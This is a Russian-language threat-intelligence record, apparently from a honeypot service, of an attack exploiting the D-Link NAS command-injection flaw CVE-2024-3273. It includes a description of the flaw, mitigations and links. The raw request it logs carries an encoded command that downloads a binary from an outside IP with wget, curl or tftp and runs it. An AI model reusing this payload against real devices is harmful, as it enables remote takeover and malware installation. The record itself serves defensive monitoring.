Информация о событии безопасности 59b2d449747258afc877efcd74bc798a

Информация об атаке

Tag
CVE-2024-3273

Date
2024-06-21

Client IP
45.148.10.174

Client GEO
the netherlands

Vendor
D-Link

Product
DNS-320L

RAW request
GET /cgi-bin/nas_sharing.cgi?cmd=15&passwd=&system=ZWNobwktZQkiXHg2M1x4NjRceDIwXHgyZlx4NzRceDZkXHg3MFx4M2JceDIwXHg3Mlx4NmRceDIwXHgyZFx4NzJceDY2XHgyMFx4NzNceDY4XHg2Ylx4M2JceDIwXHg3N1x4NjdceDY1XHg3NFx4MjBceDY4XHg3NFx4NzRceDcwXHgzYVx4MmZceDJmXHgzNFx4MzVceDJlXHgzMVx4MzRceDM4XHgyZVx4MzFceDMwXHgyZVx4MzdceDM4XHgyZlx4NzNceDY4XHg2Ylx4MjBceDdjXHg3Y1x4MjBceDYzXHg3NVx4NzJceDZjXHgyMFx4MmRceDRmXHgyMFx4NjhceDc0XHg3NFx4NzBceDNhXHgyZlx4MmZceDM0XHgzNVx4MmVceDMxXHgzNFx4MzhceDJlXHgzMVx4MzBceDJlXHgzN1x4MzhceDJmXHg3M1x4NjhceDZiXHgyMFx4N2NceDdjXHgyMFx4NzRceDY2XHg3NFx4NzBceDIwXHgyZFx4NjdceDIwXHgyZFx4NzJceDIwXHg3M1x4NjhceDZiXHgyMFx4MzRceDM1XHgyZVx4MzFceDM0XHgzOFx4MmVceDMxXHgzMFx4MmVceDM3XHgzOFx4M2JceDIwXHg2M1x4NjhceDZkXHg2Zlx4NjRceDIwXHgyYlx4NzhceDIwXHg3M1x4NjhceDZiXHgzYlx4MjBceDJlXHgyZlx4NzNceDY4XHg2Ylx4MjBceDY0XHg2Y1x4NjlceDZlXHg2Ylx4M2JceDIwXHg3Mlx4NmRceDIwXHgyZFx4NzJceDY2XHgyMFx4NzNceDY4XHg2Ylx4M2IifHNo&user=messagebus HTTP/1.0 User-Agent: Go-http-client/1.1 Host: █████████████ X-Forwarded-For: █████████████ Connection: close

RAW request

GET /cgi-bin/nas_sharing.cgi?cmd=15&passwd=&system=ZWNobwktZQkiXHg2M1x4NjRceDIwXHgyZlx4NzRceDZkXHg3MFx4M2JceDIwXHg3Mlx4NmRceDIwXHgyZFx4NzJceDY2XHgyMFx4NzNceDY4XHg2Ylx4M2JceDIwXHg3N1x4NjdceDY1XHg3NFx4MjBceDY4XHg3NFx4NzRceDcwXHgzYVx4MmZceDJmXHgzNFx4MzVceDJlXHgzMVx4MzRceDM4XHgyZVx4MzFceDMwXHgyZVx4MzdceDM4XHgyZlx4NzNceDY4XHg2Ylx4MjBceDdjXHg3Y1x4MjBceDYzXHg3NVx4NzJceDZjXHgyMFx4MmRceDRmXHgyMFx4NjhceDc0XHg3NFx4NzBceDNhXHgyZlx4MmZceDM0XHgzNVx4MmVceDMxXHgzNFx4MzhceDJlXHgzMVx4MzBceDJlXHgzN1x4MzhceDJmXHg3M1x4NjhceDZiXHgyMFx4N2NceDdjXHgyMFx4NzRceDY2XHg3NFx4NzBceDIwXHgyZFx4NjdceDIwXHgyZFx4NzJceDIwXHg3M1x4NjhceDZiXHgyMFx4MzRceDM1XHgyZVx4MzFceDM0XHgzOFx4MmVceDMxXHgzMFx4MmVceDM3XHgzOFx4M2JceDIwXHg2M1x4NjhceDZkXHg2Zlx4NjRceDIwXHgyYlx4NzhceDIwXHg3M1x4NjhceDZiXHgzYlx4MjBceDJlXHgyZlx4NzNceDY4XHg2Ylx4MjBceDY0XHg2Y1x4NjlceDZlXHg2Ylx4M2JceDIwXHg3Mlx4NmRceDIwXHgyZFx4NzJceDY2XHgyMFx4NzNceDY4XHg2Ylx4M2IifHNo&user=messagebus HTTP/1.0
User-Agent: Go-http-client/1.1
Host: █████████████
X-Forwarded-For: █████████████
Connection: close

Description
CVE-2024-3273 - это критическая уязвимость командной инъекции, затрагивающая устройства NAS от D-Link, в частности модели DNS-320L, DNS-325, DNS-327L и DNS-340L, с прошивкой до версии от 3 апреля 2024 года. Уязвимость находится в компоненте HTTP GET Request Handler, а именно в файле /cgi-bin/nas_sharing.cgi. Манипулируя аргументом 'system', злоумышленник может внедрять и выполнять произвольные команды на устройстве. Атака может быть запущена удаленно и не требует предварительной аутентификации, что делает её крайне эксплуатируемой. Уязвимость активно эксплуатируется в дикой природе, и более 90 000 устройств могут быть затронуты. Эксплойт был публично раскрыт, и доступен код доказательства концепции. Критичность этой уязвимости подчеркивается её оценкой CVSS в 9.8. Важно отметить, что эти устройства больше не поддерживаются D-Link, так как достигли статуса конца жизненного цикла (EOL) или конца обслуживания (EOS). Таким образом, официальные патчи или обновления для устранения этой проблемы предоставлены не будут.

Description

CVE-2024-3273 - это критическая уязвимость командной инъекции, затрагивающая устройства NAS от D-Link, в частности модели DNS-320L, DNS-325, DNS-327L и DNS-340L, с прошивкой до версии от 3 апреля 2024 года. Уязвимость находится в компоненте HTTP GET Request Handler, а именно в файле /cgi-bin/nas_sharing.cgi. Манипулируя аргументом 'system', злоумышленник может внедрять и выполнять произвольные команды на устройстве. Атака может быть запущена удаленно и не требует предварительной аутентификации, что делает её крайне эксплуатируемой. Уязвимость активно эксплуатируется в дикой природе, и более 90 000 устройств могут быть затронуты. Эксплойт был публично раскрыт, и доступен код доказательства концепции. Критичность этой уязвимости подчеркивается её оценкой CVSS в 9.8. Важно отметить, что эти устройства больше не поддерживаются D-Link, так как достигли статуса конца жизненного цикла (EOL) или конца обслуживания (EOS). Таким образом, официальные патчи или обновления для устранения этой проблемы предоставлены не будут.

Mitigations
Вывод из эксплуатации и замена: Поскольку затронутые устройства устарели и больше не поддерживаются, основная рекомендация - вывести их из эксплуатации и заменить на новые, поддерживаемые модели. Сегментация сети: Изолируйте затронутые устройства NAS от остальной сети, чтобы минимизировать потенциальную эксплуатацию. Правила межсетевого экрана: Реализуйте строгие правила межсетевого экрана для блокировки доступа к уязвимым конечным точкам из недоверенных сетей. Мониторинг и реагирование: Постоянно мониторьте сетевой трафик на предмет признаков эксплуатации и оперативно реагируйте на любую подозрительную активность. Отключение ненужных сервисов: Отключите все ненужные сервисы на устройствах NAS, чтобы уменьшить поверхность атаки. Консультация с производителем: Проконсультируйтесь с D-Link или специалистом по кибербезопасности для получения дальнейших рекомендаций и возможных альтернативных решений.

Mitigations


Вывод из эксплуатации и замена: Поскольку затронутые устройства устарели и больше не поддерживаются, основная рекомендация - вывести их из эксплуатации и заменить на новые, поддерживаемые модели.
Сегментация сети: Изолируйте затронутые устройства NAS от остальной сети, чтобы минимизировать потенциальную эксплуатацию.
Правила межсетевого экрана: Реализуйте строгие правила межсетевого экрана для блокировки доступа к уязвимым конечным точкам из недоверенных сетей.
Мониторинг и реагирование: Постоянно мониторьте сетевой трафик на предмет признаков эксплуатации и оперативно реагируйте на любую подозрительную активность.
Отключение ненужных сервисов: Отключите все ненужные сервисы на устройствах NAS, чтобы уменьшить поверхность атаки.
Консультация с производителем: Проконсультируйтесь с D-Link или специалистом по кибербезопасности для получения дальнейших рекомендаций и возможных альтернативных решений.

Links
https://censys.com/cve-2024-3272-and-2024-3273/ https://censys.com/cve-2024-3273/ https://github.com/Chocapikk/CVE-2024-3273 https://github.com/adhikara13/CVE-2024-3273 https://nvd.nist.gov/vuln/detail/CVE-2024-3273 https://tehtris.com/en/blog/honeypots-focus-on-cve-2024-3273/ https://thehackernews.com/2024/04/critical-flaws-leave-92000-d-link-nas.html https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/ https://www.cvedetails.com/cve/CVE-2024-3273/ https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild https://www.helpnetsecurity.com/2024/04/08/cve-2024-3273/ https://www.securityweek.com/exploitation-attempts-target-unpatched-flaw-affecting-many-d-link-nas-devices/ https://www.stormshield.com/news/security-alert-d-link-cve-2024-3272-cve-2024-3273-stormshields-product-response/ https://www.tenable.com/cve/CVE-2024-3273

Links

https://censys.com/cve-2024-3272-and-2024-3273/
https://censys.com/cve-2024-3273/
https://github.com/Chocapikk/CVE-2024-3273
https://github.com/adhikara13/CVE-2024-3273
https://nvd.nist.gov/vuln/detail/CVE-2024-3273
https://tehtris.com/en/blog/honeypots-focus-on-cve-2024-3273/
https://thehackernews.com/2024/04/critical-flaws-leave-92000-d-link-nas.html
https://www.bleepingcomputer.com/news/security/over-92-000-exposed-d-link-nas-devices-have-a-backdoor-account/
https://www.cvedetails.com/cve/CVE-2024-3273/
https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild
https://www.helpnetsecurity.com/2024/04/08/cve-2024-3273/
https://www.securityweek.com/exploitation-attempts-target-unpatched-flaw-affecting-many-d-link-nas-devices/
https://www.stormshield.com/news/security-alert-d-link-cve-2024-3272-cve-2024-3273-stormshields-product-response/
https://www.tenable.com/cve/CVE-2024-3273

Сообщество

Контакты

Cloud

Sattelite

Информация об атаке

Engine

Sattelite

Radar

Cloud

Блог

Сообщество

Контакты